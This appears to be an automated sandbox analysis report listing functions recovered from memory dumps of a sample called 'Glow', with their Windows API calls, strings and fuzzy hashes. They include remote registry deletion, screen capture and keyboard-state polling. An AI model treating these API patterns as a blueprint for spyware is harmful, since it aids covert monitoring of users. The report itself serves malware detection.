Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: 596b95403b435665a3f305d4eb56efbdde5eaff165ecd6d76445bd2ce859d6dd
Instruction ID: 270500533c16e6fccbeb2f9c78492a68bfc4ee016e3a774d44282575427f1518
Opcode Fuzzy Hash: 596b95403b435665a3f305d4eb56efbdde5eaff165ecd6d76445bd2ce859d6dd
Instruction Fuzzy Hash: A5516BB550070DBFDB229F60C988ABBBBBDFF09744F00842AFA5596250DB34D945AB60

Function 00418FCB Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,004166D6,?,?), ref: 00418FEE
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,004166D6,?,?,00000000,?), ref: 00418FFE
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,004166D6,?,?,00000000,?), ref: 00419009
CloseHandle.KERNEL32(00000000,?,?,?,?,004166D6,?,?,00000000,?), ref: 00419016
GlobalLock.KERNEL32(00000000), ref: 00419024
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,004166D6,?,?,00000000,?), ref: 00419033
GlobalUnlock.KERNEL32(00000000), ref: 0041903C
CloseHandle.KERNEL32(00000000,?,?,?,?,004166D6,?,?,00000000,?), ref: 00419043
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,004166D6,?,?,00000000,?), ref: 00419054
OleLoadPicture.OLEAUT32(?,00000000,00000000,00420C04,?), ref: 0041906D
GlobalFree.KERNEL32(00000000), ref: 0041907D
GetObjectW.GDI32(00000000,00000018,?), ref: 0041909D
CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 004190CD
DeleteObject.GDI32(00000000), ref: 004190F5
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0041910B

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 5ff7d2bba5ba91fcf42363e0e767a06afa34dc5c6e474bff269af49b3e21d7f8
Instruction ID: 2d52c270b3f182888adfec79b96331377f36089a53848f1299ce38da3b50ad29
Opcode Fuzzy Hash: 5ff7d2bba5ba91fcf42363e0e767a06afa34dc5c6e474bff269af49b3e21d7f8
Instruction Fuzzy Hash: 494136B1A00208BFDB119F65DC88EABBBB8FB89710F108069F916D7260D7749D41CB24

Function 0040C06E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0038B329: _wcslen.LIBCMT ref: 0038B333

Part of subcall function 0040D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0040C10E,?,?), ref: 0040D415
Part of subcall function 0040D3F8: _wcslen.LIBCMT ref: 0040D451
Part of subcall function 0040D3F8: _wcslen.LIBCMT ref: 0040D4C8
Part of subcall function 0040D3F8: _wcslen.LIBCMT ref: 0040D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0040C154
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0040C1D2
RegDeleteValueW.ADVAPI32(?,?), ref: 0040C26A
RegCloseKey.ADVAPI32(?), ref: 0040C2DE
RegCloseKey.ADVAPI32(?), ref: 0040C2FC
LoadLibraryA.KERNEL32(advapi32.dll), ref: 0040C352
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0040C364
RegDeleteKeyW.ADVAPI32(?,?), ref: 0040C382
FreeLibrary.KERNEL32(00000000), ref: 0040C3E3
RegCloseKey.ADVAPI32(00000000), ref: 0040C3F4

Strings

advapi32.dll, xrefs: 0040C34D
RegDeleteKeyExW, xrefs: 0040C35E

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: fbcd9be3ce5065140294de4651128236c64dc2a2f26c914f8f29bc0f2dfa5069
Instruction ID: d3905f687411d1b6a880f398f5aca3f5879073713627822b2d3298ec4053a7ff
Opcode Fuzzy Hash: fbcd9be3ce5065140294de4651128236c64dc2a2f26c914f8f29bc0f2dfa5069
Instruction Fuzzy Hash: 27C16B70604301EFD711EF54C484F6ABBE1AF84308F1485ADE85A9B3A2CB79E946CB95

Function 0041A94F Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 271windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0038249F: GetWindowLongW.USER32(00000000,000000EB), ref: 003824B0

GetSystemMetrics.USER32(0000000F), ref: 0041A990
GetSystemMetrics.USER32(00000011), ref: 0041A9A7
GetSystemMetrics.USER32(00000004), ref: 0041A9B3
GetSystemMetrics.USER32(0000000F), ref: 0041A9C9
MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 0041AC15
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0041AC33
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0041AC54
ShowWindow.USER32(00000003,00000000), ref: 0041AC73
InvalidateRect.USER32(?,00000000,00000001), ref: 0041AC95
DefDlgProcW.USER32(?,00000005,?), ref: 0041ACBB

Strings

(E, xrefs: 0041A95B
@, xrefs: 0041ABD0

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
String ID: @$(E
API String ID: 3962739598-1017287955
Opcode ID: 87e9220f1c5088b5d61eeb45ce5ef700746d72326a64788bf80ead7202affa41
Instruction ID: 1c2f4fa4327de5b34aa4f6e57668181c7e40d84c192e12427a36777876e2b534
Opcode Fuzzy Hash: 87e9220f1c5088b5d61eeb45ce5ef700746d72326a64788bf80ead7202affa41
Instruction Fuzzy Hash: 1BB19D70601219DFCF14CF68C9847EE7BF2BF44700F18806AED499B295E778A990CB99

Function 0041976A Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0038249F: GetWindowLongW.USER32(00000000,000000EB), ref: 003824B0

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 004197B6
GetFocus.USER32 ref: 004197C6
GetDlgCtrlID.USER32(00000000), ref: 004197D1
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00419879
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0041992B
GetMenuItemCount.USER32(?), ref: 00419948
GetMenuItemID.USER32(?,00000000), ref: 00419958
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0041998A
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 004199CC
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 004199FD

Strings

(E, xrefs: 00419779
0, xrefs: 004198FB

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0$(E
API String ID: 1026556194-3502916920
Opcode ID: 5215312e9124f4f806bd68fd12a781b1bf585cbaad879599c5a0a46ad2413814
Instruction ID: e16696a8b9bb35caa6a6c96eef992fd8158b05b8f0057ed493de31a3a5ac8d2f
Opcode Fuzzy Hash: 5215312e9124f4f806bd68fd12a781b1bf585cbaad879599c5a0a46ad2413814
Instruction Fuzzy Hash: 7081CCB0A14301ABD710DF25C894AEB7BE8BB89314F00492EF98597291C774DD85CBAA

Function 00402FB9 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00403035
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00403045
CreateCompatibleDC.GDI32(?), ref: 00403051
SelectObject.GDI32(00000000,?), ref: 0040305E
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 004030CA
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00403109
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 0040312D
SelectObject.GDI32(?,?), ref: 00403135
DeleteObject.GDI32(?), ref: 0040313E
DeleteDC.GDI32(?), ref: 00403145
ReleaseDC.USER32(00000000,?), ref: 00403150

Strings

(, xrefs: 004030EA

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: ac34b67213c8590b167a2a0c479143666a38d1951b47f757ceb5e59cf51afa1e
Instruction ID: bde7a05050b999bf190240eace1450e3b095192473a6175a8690733c29bc60f4
Opcode Fuzzy Hash: ac34b67213c8590b167a2a0c479143666a38d1951b47f757ceb5e59cf51afa1e
Instruction Fuzzy Hash: 3061D2B5D00219AFCF05CFA4D884EAEBBBAFF48310F20852AE555A7250D775AA41CF94

Function 003E52AA Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 259COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 003E52E6
GetWindowTextW.USER32(?,?,00000400), ref: 003E5328
_wcslen.LIBCMT ref: 003E5339
CharUpperBuffW.USER32(?,00000000), ref: 003E5345
_wcsstr.LIBVCRUNTIME ref: 003E537A
GetClassNameW.USER32(00000018,?,00000400), ref: 003E53B2
GetWindowTextW.USER32(?,?,00000400), ref: 003E53EB
GetClassNameW.USER32(00000018,?,00000400), ref: 003E5445
GetClassNameW.USER32(?,?,00000400), ref: 003E5477
GetWindowRect.USER32(?,?), ref: 003E54EF

Strings

ThumbnailClass, xrefs: 003E53BD, 003E5450

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: 29c22cff4a04d3c7be5c362f0275f33b7983e1422d7e63095b73996bb8103ea6
Instruction ID: 06f0b158495b67d1f1114a52e75f2b8ec7ada0518cbe79796ff01f2170e661e4
Opcode Fuzzy Hash: 29c22cff4a04d3c7be5c362f0275f33b7983e1422d7e63095b73996bb8103ea6
Instruction Fuzzy Hash: 66912971104B57AFD70ADF26C894BAAB7A9FF01308F004729FA86861D1EB31ED55CB91

Function 003EC8F7 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(004529C0,000000FF,00000000,00000030), ref: 003EC973
SetMenuItemInfoW.USER32(004529C0,00000004,00000000,00000030), ref: 003EC9A8
Sleep.KERNEL32(000001F4), ref: 003EC9BA
GetMenuItemCount.USER32(?), ref: 003ECA00
GetMenuItemID.USER32(?,00000000), ref: 003ECA1D
GetMenuItemID.USER32(?,-00000001), ref: 003ECA49
GetMenuItemID.USER32(?,?), ref: 003ECA90
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 003ECAD6
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003ECAEB
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003ECB0C

Strings

0, xrefs: 003EC904

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep
String ID: 0
API String ID: 1460738036-4108050209
Opcode ID: 55a5a4080650a8452758331edf55bf372fa597674e32f33690461dbe3b4a4a18
Instruction ID: c9f7c174e36dcd585b32572aba0d13c0cb6b5b55a64ec4be77ba23df966d49d6
Opcode Fuzzy Hash: 55a5a4080650a8452758331edf55bf372fa597674e32f33690461dbe3b4a4a18
Instruction Fuzzy Hash: 4261A4B09102AAAFDF12CF65CD49AEE7BB9FB05344F045265F812A72D1D734AD02CB60

Function 003EE4C2 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 003EE4D4
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 003EE4FA
_wcslen.LIBCMT ref: 003EE504
_wcsstr.LIBVCRUNTIME ref: 003EE554
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 003EE570

Strings

04090000, xrefs: 003EE5A6
%u.%u.%u.%u, xrefs: 003EE64E
StringFileInfo\, xrefs: 003EE543
\VarFileInfo\Translation, xrefs: 003EE568
DefaultLangCodepage, xrefs: 003EE5D3

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: 8d37d1427ff3efa283b44d9522f653869b25964c9dee691b313ac08daa522ab5
Instruction ID: 607417d37368454f44487e96eeffc8ff17099622f3adc548c9be8707e44bd8fa
Opcode Fuzzy Hash: 8d37d1427ff3efa283b44d9522f653869b25964c9dee691b313ac08daa522ab5
Instruction Fuzzy Hash: F7411572A002247AEB16BB658C47FFF776CDF52710F100526F901AA0C2FB799A0196A9

Function 0040D694 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0040D6C4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0040D6ED
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0040D7A8

Part of subcall function 0040D694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0040D70A
Part of subcall function 0040D694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0040D71D
Part of subcall function 0040D694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0040D72F
Part of subcall function 0040D694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0040D765
Part of subcall function 0040D694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0040D788

RegDeleteKeyW.ADVAPI32(?,?), ref: 0040D753

Strings

advapi32.dll, xrefs: 0040D718
RegDeleteKeyExW, xrefs: 0040D729

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: 93b2b0c0eb46fcd86f2cd110f269de041cce6a322160add64f05e4e1fef4112a
Instruction ID: 13d88c41533cdd07289c365a404ff7712fce9173bbc16c45cda4ccad758121bd
Opcode Fuzzy Hash: 93b2b0c0eb46fcd86f2cd110f269de041cce6a322160add64f05e4e1fef4112a
Instruction Fuzzy Hash: 2E3180B5E01128BBD7219B90DC88EFFBB7CEF45754F004176B805E3244DB389E499AA8

Function 003EEFC7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 003EEFCB

Part of subcall function 0039F215: timeGetTime.WINMM(?,?,003EEFEB), ref: 0039F219

Sleep.KERNEL32(0000000A), ref: 003EEFF8
EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 003EF01C
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 003EF03E
SetActiveWindow.USER32 ref: 003EF05D
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 003EF06B
SendMessageW.USER32(00000010,00000000,00000000), ref: 003EF08A
Sleep.KERNEL32(000000FA), ref: 003EF095
IsWindow.USER32 ref: 003EF0A1
EndDialog.USER32(00000000), ref: 003EF0B2

Strings

BUTTON, xrefs: 003EF030

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: ab14d9b959f926434348667e7fa3ec770985f31423c029a32836bc9dc7b8a36d
Instruction ID: 3c40f27f2ea57bae8c286ddfc06646a6fca387eb563a94a56c2add5bf6049144
Opcode Fuzzy Hash: ab14d9b959f926434348667e7fa3ec770985f31423c029a32836bc9dc7b8a36d
Instruction Fuzzy Hash: BD21A4B5500364BFE7226F31ECC9B667B69F74974AB014139F505822F3CBB5CD058619

Function 003EF313 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 0038B329: _wcslen.LIBCMT ref: 0038B333

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 003EF374
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 003EF38A
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003EF39B
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 003EF3AD
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 003EF3BE

Strings

close PlayMe, xrefs: 003EF385, 003EF3B2
alias PlayMe, xrefs: 003EF34D
play PlayMe wait, xrefs: 003EF3A8
open , xrefs: 003EF323
status PlayMe mode, xrefs: 003EF36F
play PlayMe, xrefs: 003EF3B9

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: f43c1cd6c95462278784dc3e5f18e51601d38b679559e728fcb448e5a2fd504c
Instruction ID: 34fca5ebf12c7120d632cf023cb24bc92fa02d35fcc95fe9bed78e2847073d80
Opcode Fuzzy Hash: f43c1cd6c95462278784dc3e5f18e51601d38b679559e728fcb448e5a2fd504c
Instruction Fuzzy Hash: E111E375A902A93DF722B3628C4AFFFAA7CEBD1B00F00056B7401E60D0DBA41D09C6B4

Function 003B2FF3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 003B3007

Part of subcall function 003B2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,003BDB51,00451DC4,00000000,00451DC4,00000000,?,003BDB78,00451DC4,00000007,00451DC4,?,003BDF75,00451DC4), ref: 003B2D4E
Part of subcall function 003B2D38: GetLastError.KERNEL32(00451DC4,?,003BDB51,00451DC4,00000000,00451DC4,00000000,?,003BDB78,00451DC4,00000007,00451DC4,?,003BDF75,00451DC4,00451DC4), ref: 003B2D60

_free.LIBCMT ref: 003B3013
_free.LIBCMT ref: 003B301E
_free.LIBCMT ref: 003B3029
_free.LIBCMT ref: 003B3034
_free.LIBCMT ref: 003B303F
_free.LIBCMT ref: 003B304A
_free.LIBCMT ref: 003B3055
_free.LIBCMT ref: 003B3060
_free.LIBCMT ref: 003B306E

Strings

&B, xrefs: 003B2FFE

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: &B
API String ID: 776569668-3208460036
Opcode ID: 8f0639adedf424688b837fb4cb08be95d59c2f9a8a72a66307d9cafcbbd8c89a
Instruction ID: f92ba03dc9e3cf74906cc402516b0f1403df3f379b4ff7b1fb38a6cd9c1d71e7
Opcode Fuzzy Hash: 8f0639adedf424688b837fb4cb08be95d59c2f9a8a72a66307d9cafcbbd8c89a
Instruction Fuzzy Hash: 12119B76600108BFCB02EF94C942DDE3B75EF09354B914AA9FA189F932D631DF519B50

Function 003EA958 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 003EA9D9
SetKeyboardState.USER32(?), ref: 003EAA44
GetAsyncKeyState.USER32(000000A0), ref: 003EAA64
GetKeyState.USER32(000000A0), ref: 003EAA7B
GetAsyncKeyState.USER32(000000A1), ref: 003EAAAA
GetKeyState.USER32(000000A1), ref: 003EAABB
GetAsyncKeyState.USER32(00000011), ref: 003EAAE7
GetKeyState.USER32(00000011), ref: 003EAAF5
GetAsyncKeyState.USER32(00000012), ref: 003EAB1E
GetKeyState.USER32(00000012), ref: 003EAB2C
GetAsyncKeyState.USER32(0000005B), ref: 003EAB55
GetKeyState.USER32(0000005B), ref: 003EAB63

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
